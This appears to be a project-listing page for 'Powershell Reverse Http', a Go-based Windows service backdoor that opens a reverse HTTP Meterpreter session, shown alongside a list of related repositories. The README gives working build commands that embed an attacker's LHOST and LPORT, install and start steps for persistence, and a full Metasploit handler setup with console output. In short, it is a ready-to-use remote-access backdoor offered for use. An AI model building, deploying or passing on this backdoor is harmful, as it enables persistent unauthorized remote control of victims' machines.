All Projects → mauri870 → Powershell Reverse Http

mauri870 / Powershell Reverse Http

😇 A Powershell exploit service that opens a reverse http connection via meterpreter

Programming Languages

go
31211 projects - #10 most used programming language

Projects that are alternatives of or similar to Powershell Reverse Http

Metasploit Cheat Sheet
Metasploit Cheat Sheet 💣
Stars: ✭ 139 (+33.65%)
Mutual labels:  metasploit-framework, meterpreter
Flying Pigeon
flying-pigeon 是一个IPC 跨进程通信组件,底层是匿名内存+Binder , 突破1MB大小限制,无需写AIDL文件,让实现跨进程通信就像写一个接口一样简单
Stars: ✭ 97 (-6.73%)
Mutual labels:  service
Monconn
A TCP connection monitoring tool written in Go.
Stars: ✭ 69 (-33.65%)
Mutual labels:  service
Msf Venom Cheatsheet
Single Page Cheatsheet for common MSF Venom One Liners
Stars: ✭ 81 (-22.12%)
Mutual labels:  metasploit-framework
Zun
Containers Service for OpenStack. Mirror of code maintained at opendev.org.
Stars: ✭ 69 (-33.65%)
Mutual labels:  service
Service
Android Service Examples
Stars: ✭ 91 (-12.5%)
Mutual labels:  service
Videosniffer
视频嗅探服务(VideoSniffer API Service On Android)
Stars: ✭ 68 (-34.62%)
Mutual labels:  service
Nginx Haskell Module
Nginx module for binding Haskell code in configuration files for great good!
Stars: ✭ 99 (-4.81%)
Mutual labels:  service
Paysuper Billing Server
A core monolith-like service with all payment processing business logic in PaySuper.
Stars: ✭ 95 (-8.65%)
Mutual labels:  service
Charon
Authorization and authentication service.
Stars: ✭ 79 (-24.04%)
Mutual labels:  service
Neutron
OpenStack Networking (Neutron). Mirror of code maintained at opendev.org.
Stars: ✭ 1,205 (+1058.65%)
Mutual labels:  service
Bekit
bekit框架致力于解决在应用开发中的公共性痛点,已有“事件总线”、“流程引擎”、“服务引擎”。其中“流程引擎”可作为分布式事务解决方案saga模式的一种实现,并且它很轻量不需要服务端、不需要配置,就可直接使用。
Stars: ✭ 71 (-31.73%)
Mutual labels:  service
X
新生命X组件,数据中间件XCode、日志、网络、RPC、序列化、缓存、Windows服务
Stars: ✭ 1,322 (+1171.15%)
Mutual labels:  service
Caddy V1 Service
⬛️ Run Caddy as a service
Stars: ✭ 69 (-33.65%)
Mutual labels:  service
Voipussd
📞 IMEI (USSD) Library on Android Devices by @romellfudi
Stars: ✭ 97 (-6.73%)
Mutual labels:  service
Automator
Various Automator and AppleScript workflow and scripts for simplifying life
Stars: ✭ 68 (-34.62%)
Mutual labels:  service
Horizon
OpenStack Dashboard (Horizon). Mirror of code maintained at opendev.org.
Stars: ✭ 1,195 (+1049.04%)
Mutual labels:  service
Eggshell
iOS/macOS/Linux Remote Administration Tool
Stars: ✭ 1,286 (+1136.54%)
Mutual labels:  meterpreter
Ehealth.api
Index page and integration layer for projects that related to Ukrainian Health Services government institution
Stars: ✭ 103 (-0.96%)
Mutual labels:  service
Autopwn
A simple bash based metasploit automation tool!
Stars: ✭ 99 (-4.81%)
Mutual labels:  meterpreter

Powershell Reverse Http

Note: Use this program at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authorization

Meterpreter-like backdoors are a pretty common attack vector and most decent antiviruses detect this behavior as a virus.

A simple windows service running on background that connects with a meterpreter session via http.

Usage

First, you need go for build the binary (duh!) and metasploit-framework to accept the reverse connection:

git clone https://github.com/mauri870/powershell-reverse-http.git
cd powershell-reverse-http
env GOOS=windows go build -ldflags "-X main.LHOST=10.10.10.2 -X main.LPORT=3000" -o powershell-reverse.exe

Change the LPORT and LHOST to match your metasploit handler

Usage

powershell-reverse.exe
no command specified

usage: powershell-reverse.exe <command>
       where <command> is one of
       install, remove, debug, start, stop, restart, pause or continue.

After install and start, the service is always up and trying to connect on host and port specified on exploit.go

On the attacker's machine:

./msfconsole --quiet
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST YOUR_IP_ADDRESS_HERE
LHOST => YOUR_IP_ADDRESS_HERE
msf exploit(handler) > set LPORT YOUR_PORT_TO_AWAIT_CONNECTION_HERE
LPORT => YOUR_PORT_TO_AWAIT_CONNECTION_HERE
msf exploit(handler) > exploit

[*] Started HTTP reverse handler on http://LHOST:LPORT
[*] Starting the payload handler... 
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].